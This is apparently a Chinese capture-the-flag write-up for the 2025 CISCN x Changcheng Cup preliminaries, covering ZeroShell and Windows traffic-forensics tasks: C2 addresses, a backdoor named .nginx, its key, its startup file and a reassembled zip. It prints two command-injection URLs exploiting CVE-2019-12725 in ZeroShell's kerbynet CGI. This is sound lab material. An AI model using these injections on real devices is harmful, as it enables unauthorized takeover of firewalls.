2025年CISCNx长城杯初赛部分WriteUp

zeroshell_1

从数据包中找出攻击者利用漏洞开展攻击的会话（攻击者执行了一条命令），写出该会话中设置的flag, 结果提交形式：flag{xxxxxxxxx}

由题目可知flag应该是直接在流量中的，明文存储或者编码过，直接搜

zeroshell_2

2.通过漏洞利用获取设备控制权限，然后查找设备上的flag文件，提取flag文件内容，结果提交形式：flag{xxxxxxxxxx}

分析流量可知利用的漏洞是CVE-2019-12725

命令执行找flag文件

61.139.2.100/cgi-bin/kerbynet?Action=x509view&Section=NoAuthREQ&User=&x509type=%27%0Afind / -name flag%0A

cat

zeroshell_3

3.找出受控机防火墙设备中驻留木马的外联域名或IP地址，结果提交形式：flag{xxxx}，如flag{www.abc.com} 或 flag{16.122.33.44}

已知受害主机ip为61.139.2.100

过滤

ip.src == 61.139.2.100

分析发现与请求过202.115.89.103的8080端口

丢微步查询发现有相关后门样本

zeroshell_4

4.请写出木马进程执行的本体文件的名称，结果提交形式：flag{xxxxx}，仅写文件名不加路径

上题ip的相关样本

其中一个是.nginx

靶机中也能查到

zeroshell_5

5.请提取驻留的木马本体文件，通过逆向分析找出木马样本通信使用的加密密钥，结果提交形式：flag{xxxx}

利用漏洞配合bp，cat /Database/.nginx，base64保存结果得到

解码丢入ida32

查看字符串可以找到ip，下面还有一串字符串

跟进

提交发现就是加密密钥

zeroshell_6

6.请写出驻留木马的启动项，注意写出启动文件的完整路径。结果提交形式：flag{xxxx}，如flag{/a/b/c}

启动文件，文件内容肯定会包含这个.nignx

grep搜索，在var目录发现

61.139.2.100/cgi-bin/kerbynet?Action=x509view&Section=NoAuthREQ&User=&x509type=%27%0Agrep -rl ".nginx" /var%0A

cat

WinFT_1

1、受控机木马的回连域名及ip及端口是（示例：flag{xxx.com:127.0.0.1:2333}）

分析流量，发现有个exe

域名：miscflvol.com，ip：192.168.116.130

火绒剑里也能看到

端口：443

WinFT_2

2、受控机启动项中隐藏flag是

发现一直会有弹窗，应该是计划任务

解码得到

WinFT_5

5、分析流量，获得压缩包中得到答案

直接过滤flag

追踪http流

分析发现该zip存在两个文件，一个flag.txt，一个Everythin.zip，但是前段数据缺少，到流量中继续分析发现

刚才的zip数据对应的是请求/server得到的内容

过滤http流，发现还请求了/client

追踪http流

正是缺少的头部

拼接后得到

注释解码得到

找了半天不知道是什么，用这个作为密码发现对了